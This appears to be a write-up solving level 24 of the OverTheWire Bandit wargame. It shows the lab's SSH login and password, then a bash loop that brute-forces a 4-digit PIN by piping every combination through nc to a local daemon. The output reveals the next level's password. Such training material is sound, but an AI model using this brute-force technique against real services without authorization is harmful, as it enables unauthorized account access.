Level goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time.

Login

ssh bandit24@bandit.labs.overthewire.org -p 2220
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

Doc

nc (1)               - arbitrary TCP and UDP connections and listens

Articles

Usefull read if you are new to bash scripting
File permissions

Solution

We will write a bash script again since we need to repeatedly send request and we wouldn`t want to do that by hand. Create a temp dir mktemp -d and touch a file and give it execute rights.

My script:

#!/bin/bash


for a  in {0000..9999}
do
	echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 $a";
done | nc localhost 30002 > keys.txt

cat keys.txt | grep bandit25

Script breakdown

For a variable a in the range of 0000 and 9999, we are gonna echo the current password and $a(values of a) and pipe it to the daemon on port 30002 since you can`t open nc before the loop without it waiting for a kill before letting the loop do the parsing. The ouput of all of this will be ouput into keys.txt. The grep doesn`t matter since the daemon breaks either way when inserting the correct value.

bandit24@bandit:/tmp/tmp.dxMibZCdBZ$ ./script.sh
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4